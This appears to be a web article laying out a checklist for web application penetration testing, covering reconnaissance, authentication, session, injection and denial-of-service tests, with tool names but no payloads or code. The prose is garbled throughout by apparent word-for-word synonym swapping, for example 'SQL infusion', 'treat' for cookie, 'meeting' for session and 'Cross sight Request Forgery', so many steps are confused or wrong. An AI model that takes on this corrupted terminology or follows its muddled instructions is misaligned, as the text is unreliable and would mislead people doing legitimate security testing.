Web Application Penetration Testing

Web Application Penetration Testing


Web application penetration testing involves four fundamental advances including information gathering, exploration, and abuse, detailing and proposals, and remediation with progressing support. These tests are performed basically to keep up with secure programming code advancement all through its lifecycle. Coding botches, explicit essential or absence of information in cyber attack vectors are the primary reason for playing out this kind of penetration test.

Why Are Web Application Pen Tests Performed?

Because of the enormous extension of web applications, increasingly more web assets are being spent on fostering the product just as designing the applications to work appropriately on this new scene. 

This newly discovered outskirt has anyway opened up another vector of attack that malicious programmers can use for their own benefits. 

Taking into account that some web applications hold delicate information, keep them secure consistently, particularly since a ton of them are openly presented to the web. 

Playing out the web application penetration testing as a component of your Software Development Life Cycle or SDLC collaboration would be the most useful framework in warding off-web application shortcomings.


  • Information Gathering 
  1. Recover and Analyze the robot.txt records by utilizing an apparatus called GNU Wget. 
  2. Analyze the variant of the product. information base Details, the mistake specialized part, bugs by the blunder codes by mentioning invalid pages. 
  3. Execute methods like DNS backward questions, DNS zone Transfers, electronic DNS Searches. 
  4. Perform Directory style Searching and weakness checking, Probe for URLs, utilizing apparatuses like NMAP and Nessus. 
  5. Distinguish the Entry purpose in the application utilizing Burp Proxy, OWASP ZAP, TemperIE, Webscarab Tamper Data. 
  6. By utilizing conventional Fingerprint Tool like Nmap, Amap, perform TCP/ICMP and administration Fingerprinting. 

7.By Requesting Common File Extension such as.ASP,EXE, .HTML, .PHP ,Test for perceived record types/Extensions/Directories. 

  1. Analyze the Sources code From the Accessing Pages of the Application front end.
  • Authentication Testing 
  1. Check-in case it is possible to “reuse” the meeting after Logout. also look at if the application naturally logs a client as inactive for a specific measure of time. 
  2. Check whether any touchy data Remain Stored put away in program reserve. 
  3. Check and attempt to Reset the secret word, by friendly designing, break clandestine inquiries, and speculating. 

4.check if the “Recall my secret phrase” Mechanism is executed by checking the HTML code of the login page. 

  1. Check if the equipment gadgets straightforwardly convey and autonomously with validation foundation utilizing an extra correspondence channel. 
  2. Test CAPTCHA for verification weaknesses introduced or not. 
  3. Check whether any feeble security questions/Answers are introduced. 
  4. A fruitful SQL infusion could prompt the deficiency of client trust and aggressors can take telephone numbers, locations, and Visa subtleties. Setting a web application firewall can sift through the malignant SQL inquiries in the rush hour gridlock.
  • Authorization Testing 
  1. To Access the Resources test the Role and Privilege Manipulation.

2.Test For Path Traversal by Performing input Vector Enumeration and break down the info approval capacities introduced in the web application. 

3.Test for treat and boundary Tempering utilizing web insect devices. 

  1. Test for HTTP Request Tempering and check whether to acquire illicit admittance to held assets.
  • Configuration Management Testing
  1. Check index and File Enumeration survey worker and application Documentation. in addition, check the framework and application administrator interfaces. 
  2. Break down the Web worker pennant and Performing network examining. 
  3. Check and confirm the presence of old Documentation and Backup and refer to records, for example, source codes, passwords, establishment ways. 

4.check and recognize the ports related to the SSL/TLS administrations utilizing NMAP and NESSUS. 

5.Review OPTIONS HTTP strategy utilizing Netcat and Telnet. 

  1. Test for HTTP strategies and XST for qualifications of real clients. 
  2. Perform application arrangement the board test to audit the data of the source code, log records, and default Error Codes.
  • Session Management Testing
  1. Check the URLs in the Restricted region to Test for Cross sight Request Forgery. 

2.Test for Exposed Session factors by examining Encryption and reuse of meeting token, Proxies and storing, GET_POST. 

  1. Gather an adequate number of treat tests and dissect the treat test calculation and manufacture a substantial Cookie to play out an Attack. 
  2. Test the threat trait utilizing capture intermediaries like Burp Proxy, OWASP ZAP, or traffic catch intermediaries like Tamper Data. 
  3. Test the meeting Fixation, to keep away from the seal client session. (session Hijacking )
  • Data Validation Testing
  1. Performing Sources code Analyze for javascript Coding Errors. 
  2. Perform Union Query SQL infusion testing, standard SQL infusion Testing, daze SQL question Testing, utilizing instruments, for example, SQL ninja, sqldumper, SQL power injector .and so forth 
  3. Break down the HTML Code, Test for putting away XSS, influence put away XSS, utilizing apparatuses like XSS intermediary, Back frame, Burp Proxy, OWASP, ZAP, XSS Assistant. 
  4. Perform LDAP infusion testing for delicate data about clients and hosts. 
  5. Perform IMAP/SMTP infusion Testing for Access the Backend Mail worker. 

6.Perform XPATH Injection Testing for Accessing the secret data 

  1. Perform XML infusion testing to know data about XML Structure. 
  2. Perform Code infusion testing to distinguish input approval Errors. 
  3. Perform Buffer Overflow testing for Stack and load memory data and application control stream. 
  4. Test for HTTP Splitting and carrying for treats and HTTP divert data.
  • Denial of Services Testing
  1. Send Any Large number of Requests that perform data set tasks and notice any Slowdown and New Error Messages. 

2.Perform manual source code examination and present scope of info shifting lengths to the applications 

3.Test for SQL special case assaults for application data testing. Undertaking Networks ought to pick the best DDoS Attack counteraction administrations to guarantee the DDoS assault insurance and forestall their organization 

  1. Test for User determines to object distribution whether the greatest number of items that application can deal with. 
  2. Enter the Extreme Large number of the information field utilized by the application as a Loop counter. Shield site from future assaults Also Checks your Company DDOS Attack Downtime Cost. 
  3. Utilize content to naturally present an incredibly long incentive for the worker to log the solicitation.


About Author

Leave a Reply

Your email address will not be published. Required fields are marked *

Open chat
Can we help you?